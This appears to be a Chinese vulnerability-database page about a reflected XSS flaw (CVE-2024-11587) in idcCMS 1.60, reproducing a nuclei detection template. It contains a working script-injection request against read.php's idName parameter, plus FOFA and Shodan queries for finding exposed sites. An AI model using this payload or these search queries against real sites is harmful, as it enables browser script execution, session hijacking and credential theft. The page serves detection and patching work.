idcCMS V160 跨站脚本漏洞

漏洞信息

漏洞名称: idcCMS V1.60 跨站脚本漏洞

漏洞编号:

  • CVE: CVE-2024-11587

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: idcCMS是一款内容管理系统,广泛用于网站建设和管理。它提供了一个用户友好的界面,允许用户轻松创建和管理网站内容。idcCMS V1.60版本存在反射型跨站脚本(XSS)漏洞,攻击者可以通过构造恶意的idName参数在受害者的浏览器中执行任意JavaScript代码。该漏洞的根源在于read.php文件中对idName参数的用户输入未进行适当的过滤和编码,导致恶意脚本被直接嵌入到返回的HTML页面中。成功利用此漏洞的攻击者可以执行会话劫持、凭证窃取或其他恶意操作,严重影响网站的安全性和用户数据的保密性。由于此漏洞不需要用户认证即可利用,且可以通过网络自动触发,因此具有较高的潜在风险。建议用户及时更新到最新版本,并对所有用户输入实施严格的验证和输出编码措施。

产品厂商: idccms

产品名称: idcCMS

影响版本: 1.60

搜索语法: title=”idcCMS”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/f6ca15f89b6cecc1d200044797337030b47fc54c/http%2Fcves%2F2024%2FCVE-2024-11587.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2024-11587

info:
name: idcCMS V1.60 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
impact: |
Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
remediation: |
Update idcCMS to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the idName parameter in read.php.
reference:
- https://github.com/Hebing123/cve/issues/75
- https://nvd.nist.gov/vuln/detail/CVE-2024-11587
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-11587
cwe-id: CWE-79
cpe: cpe:2.3:a:idccms:idccms:1.60:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: idccms
product: idccms
fofa-query: title="idcCMS"
shodan-query: title:"idcCMS"
tags: cve,cve2024,xss,idccms

http:
- method: GET
path:
- "{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData"

matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'add(new Option'
condition: and

- type: word
part: content_type
words:
- 'text/html'

- type: status
status:
- 200


idcCMS V160 跨站脚本漏洞
http://example.com/2025/07/17/github_2573304999/
作者
lianccc
发布于
2025年7月17日
许可协议